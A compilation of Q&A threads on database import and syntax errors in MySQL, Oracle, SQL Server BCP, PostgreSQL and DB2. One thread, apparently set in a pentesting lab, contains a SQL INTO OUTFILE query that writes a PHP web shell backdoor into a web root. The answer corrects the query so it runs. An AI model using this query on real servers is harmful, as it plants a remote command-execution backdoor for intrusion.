MySQL Dump Error 1064 (42000) - sql

I'm having a MySQL dump from Version 4.0.21. I converted it to UTF-8 to fit with the special characters such as (Ü, ü, Ä, ä, Ö, ö, ß). Now I have to import it into the latest MySQL Version 5.5.36. All data have been imported but an error occurred at the end.
ERROR 1064 (42000) at line 80769: You have an error in your SQL syntax...use near '' at line 1
The empty string and the line numbers are confusing me. Importing with phpMyAdmin results the same as command line does, with the command:
mysql -u root -p bugtracker < E:\mantisUTF.dump
The import with the original dump from Version 4.0.21 is working perfect but without the above mentioned special characters.
First Lines of the dump file:
-- MySQL dump 9.11
--
-- Host: localhost Database: Mantis
-- ------------------------------------------------------
-- Server version 4.0.21-debug
--
-- Table structure for table `mantis_bug_file_table`
--
Last Lines (80768 & 80769):
INSERT INTO mantis_user_table VALUES (57,'fullName','firstName lastName','emailAdress','dd1875c93e8f17a24ebaf9c902b7165a','2014-01-29 13:43:21','2014-03-26 13:22:47',1,0,55,14,0,0,'1b886436b0c62598ab66e40ae89f0c016dc5777ebb601a73f2a07536281113ae'
Thanks in advance.
Relax

By rechecking my question i found the problem. The problem was a missing ')' at the end of the dump file.
Last line:
INSERT INTO mantis_user_table VALUES (57,'fullName','firstName lastName','emailAdress','dd1875c93e8f17a24ebaf9c902b7165a','2014-01-29 13:43:21','2014-03-26 13:22:47',1,0,55,14,0,0,'1b886436b0c62598ab66e40ae89f0c016dc5777ebb601a73f2a07536281113ae')

Related

How to split a large query in command line?

I installed oracle db version 19c in my docker environment and set up a database filled with dummy data. However, when I try to run a very large query I get the error:
SP2-0341: line overflow during variable substitution (>3000 characters at line 1).
I tried splitting it up with linebreaks but depending on how I split it I get all kinds of errors like:
ERROR at line 2: ORA-00933: SQL command not properly ended
or
ERROR at line 2:
SP2-0341: line overflow during variable substitution (>3000 characters at line 3)
The query is formatted as
SELECT AA.n_name AS AA_n_name, AA.n_nationkey AS ...
FROM nation AS AA FULL OUTER JOIN supplier...
WHERE (AC.p_partkey = ... AND...) OR((AC.p_partkey = ...)); -- The where part is over 5000 characters long--
Is there an alternative or solution to tackling this in the command line? I tried running the query as a sql file as well and hit a 4999 limit. I am on a Ubuntu server if that would help and any assistance would be appreciated.
It depends on the environment that you're working in, but generally you are able to continue a command onto the next line by ending the line with a 'back slash' \.

Troubleshooting BCP and Format File Errors

First off, sorry for the long post. I wanted to be thorough with my examples/data, and the bulk of this post is just that.
I inherited a Bulk Import Process using a format file (.fmt) at my new job. This process was created by the guy that worked here before me, and it is my job to learn this process (and fix it now). I have limited knowledge of this stuff, but I have done some research. After a few weeks, I haven't really gotten anywhere. Here is what I am working with...
--BCP Command to import data from C:\Desktop\20180629_2377167_PR_NP.txt to table LA_Temp.dbo.ProvReg
bcp LA_Temp.dbo.ProvReg IN C:\Desktop\20180629_2377167_PR_NP.txt -f C:\Desktop\PROVREG.FMT -T -S SERVERNAME -k -m 1000000
--Table Structure which format file is created from:
SELECT [NPI]
,[D1]
,[EntityType]
,[D2]
,[ReplaceNPI]
,[D3]
,[ProvName]
,[D4]
,[MailAddr1]
,[D5]
,[MailAddr2]
,[D6]
,[MailCity]
,[D7]
,[MailState]
,[D8]
,[MailZip]
,[D9]
,[MailCountry]
,[D10]
,[MailPhone]
,[D11]
,[MailFax]
,[D12]
,[LocAddr1]
,[D13]
,[LocAddr2]
,[D14]
,[LocCity]
,[D15]
,[LocState]
,[D16]
,[LocZip]
,[D17]
,[LocCountry]
,[D18]
,[LocPhone]
,[D19]
,[LocFax]
,[D20]
,[Taxonomy1]
,[D21]
,[Taxonomy2]
,[D22]
,[Taxonomy3]
,[D23]
,[OtherProvID]
,[D24]
,[OtherProvIDType]
,[D25]
,[ProvEnumDate]
,[D26]
,[LastUpdate]
,[D27]
,[DeactivateRC]
,[D28]
,[DeactivateDate]
,[D29]
,[ReactivateDate]
,[D30]
,[Gender]
,[D31]
,[License]
,[D32]
,[LicenseState]
,[D33]
,[AuthorizedContact]
,[D34]
,[ContactTitle]
,[D35]
,[ContactPhone]
,[D36]
,[PanelOpen]
,[D37]
,[Language1]
,[D38]
,[Language2]
,[D39]
,[Language3]
,[D40]
,[Language4]
,[D41]
,[Language5]
,[D42]
,[AgeRestrict]
,[D43]
,[PCPMax]
,[D44]
,[PCPActual]
,[D45]
,[PCPAll]
,[D46]
,[EnrollInd]
,[D47]
,[EnrollDate]
,[D48]
,[FamilyOnly]
,[D49]
,[SubSpec1]
,[D50]
,[SubSpec2]
,[D51]
,[SubSpec3]
,[D52]
,[ContractName]
,[D53]
,[ContractBegin]
,[D54]
,[ContractEnd]
,[D55]
,[Parish1]
,[D56]
,[Parish2]
,[D57]
,[Parish3]
,[D58]
,[Parish4]
,[D59]
,[Parish5]
,[D60]
,[Parish6]
,[D61]
,[Parish7]
,[D62]
,[Parish8]
,[D63]
,[Parish9]
,[D64]
,[Parish10]
,[D65]
,[Parish11]
,[D66]
,[Parish12]
,[D67]
,[Parish13]
,[D68]
,[Parish14]
,[D69]
,[Parish15]
,[D70]
,[PCPInd]
,[D71]
,[DisplayOnline]
,[D72]
,[ExpAgeRestrict]
,[D73]
,[Suffix]
,[D74]
,[Title]
,[D75]
,[PrescriberInd]
,[Spaces]
,[End]
FROM [LA_Temp].[dbo].[ProvReg]
--Example Text File Data (this is one line)
9999999999 ^0^ ^ ^3800 HMA BLVD STE 305 ^ ^METAIRIE ^LA^70006 ^ ^5048729679^ ^3800 HMA BLVD ^ ^METAIRIE ^LA^70006 ^ ^9999999999^ ^207Q00000X^ ^ ^0000000^2001^ ^00000000^ ^00000000^00000000^F^ ^LA^ ^ ^ ^N^1^0^0^0^0^2^00000^00000^00000^ ^ ^ ^ ^ ^ ^000000000000000000000000000000^00000000^00000000^26^00^00^00^00^00^00^00^00^00^00^00^00^00^00^0^0^Accept patients of age 000-000^ ^MD ^ ^
--Format file
11.0
153
1 SQLCHAR 0 40 "\t" 1 NPI SQL_Latin1_General_Pref_CP1_CI_AS
2 SQLCHAR 0 2 "\t" 2 D1 SQL_Latin1_General_Pref_CP1_CI_AS
3 SQLCHAR 0 2 "\t" 3 EntityType
...all the way to...
153 SQLCHAR 0 2 "\r\n" 153 End
I have changed directories, servername, and some of the text file data to maintain security, however, it is very similar.
Here is the problem I am encountering:
With the "\t" used in the format file I just created from the SQL table, I get the error: [Microsoft][SQL Server Native Client 11.0]Unexpected EOF encountered in BCP data-file.
If I change this to just "" or "^" (as I 'think' it should be since the text file is using carrot delimiter), the rows began to copy with error
[Microsoft][SQL Server Native Client 11.0]String data, right truncation SQLState = 22001, NativeError = 0. BCP copy in failed.
If anyone can please point me in the right direction here for troubleshooting this issue, or if you see anything out of place, please let me know. As I mentioned, I have been at this for some time, and can use any suggestions I can get. Unfortunately, there is no one at my company I can ask about this.
try adding the -e option to your bcp command. this will give you an error file in which BCP will write some samlpe lines from the file that it had problems with. Very helpful with troubleshooting the type of error you are getting now (you are correct to change your delimiter in the format file).
The error you are getting now "string data" and "truncation" is just as it states. However, this truncation can be occurring for a number of reasons. The destination table's columns may not be large enough to hold the data that is contained between the defined field delimiters. There may be delimiters appearing in your data and so this could be tricking the bcp utility into thinking a column has ended before it was intended to end in the file (this is less likely with the delimiter you are using... but ya never know... I always prefer fixed width if possible.). And, of course, the source of the data may very well have written you a file that contradict whatever agreed upon spec led you to define your destination as you have.
The error is accurate, teh trick is finding where. Use the -e option to allow BCP to capture problematic lines:
BCP table_dest IN "C:\FILE.TXT" -S SVR -T -f"C:\FORMAT_FILE.txt" -e"C:\ERROR_FILE.txt"
The "error_file.txt" will include line numbers and will include a sample of lines that it couldn't handle. Just copy and past to find in the file youare trying to load to see for yourself.
Strongly suggest using a more advanced text editing tool. Do not use windows notepad or wordpad. Use something like notepad++ or ultraedit to inspect ascii text files.

php code injection in phpmyadmin

I'm toying with some pentesting VMs, and I'm trying a shell upload in phpmyadmin.
The tutorial, I'm trying to follow is http://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/
The question I have however is pure SQL - the command I'm trying to use:
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”
is producing the following error:
Error
There seems to be an error in your SQL query. The MySQL server error output below, if there is any, may also help you in diagnosing the problem
ERROR: Unknown Punctuation String # 9
STR: <?
SQL: SELECT “<?php system($_GET[‘cmd’]);SELECT “<?php system($_GET[‘cmd’]);SELECT “<?php system($_GET[‘cmd’]);
SQL query: Documentation
SELECT “<?php system($_GET[‘cmd’]);
MySQL said: Documentation
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?php system($_GET[‘cmd’])' at line 1
Any ideas how could I format it to be accepted?
The quotes were copied dirty. Replace them after pasting the snippet:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php";

Getting Internal Server Error on pgSQL

Im tryingto import data from windows CSV (comma delimiter) file into pgSQL faxtest1 table, but I keep getting error saying "The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application."
The following is my code:
COPY faxtest1
FROM 'C:‪\Users\David\Desktop\test3.csv'
WITH DELIMITER AS ',' CSV ;
The CSV file is like:
Status,Fax ID
Fax to Email,2104
Fax to Email,2108
It is a bug of pg admin 4, hope they will fix it in the future.
In version 14, in the Import/Export data function, there are 2 columns, "Options" and "Columns." Try manually select the columns one at time, separated by a comma. See if this would by pass the error.
It worked for me.

DB2 database stores/reads umlauts and special chars wrong

I create my database with the following command:
db2 create database kixfs using codeset UTF-8 territory AT
My insert scripts (DMLs) are ecoded in UTF-8.
Example insert statement from resources.dml:
INSERT INTO RESOURCES (RESOURCEKEY, LANGUAGE, CATEGORY, RESOURCEVALUE) VALUES ('XXXX', 'de', 'action', 'Funktion "Gerätemodell erfassen" erfolgreich ausgeführt.');
If i check the table content after creation:
Fehler bei der Ausführung der Funktion "Gerätemodell erfassen".
If i check the database configuration everything looks fine: (db2 get db cfg for MY_DB)
Any ideas why the data is read or stored wrong?
Edit:
I execute the insert script via a batchfile from the db2 admin console (CLP):
db2 -t -v -f resources.dml +o -z createTablesViews.log
Could it depend from the encoding of the db2 termminal?? And if yes how do i change it?
We had the same problem. Script, too. The script encoding has to match the server encoding, in our case ANSI. Even if the database is UTF-8. Converting the script file to ANSI did the trick for us.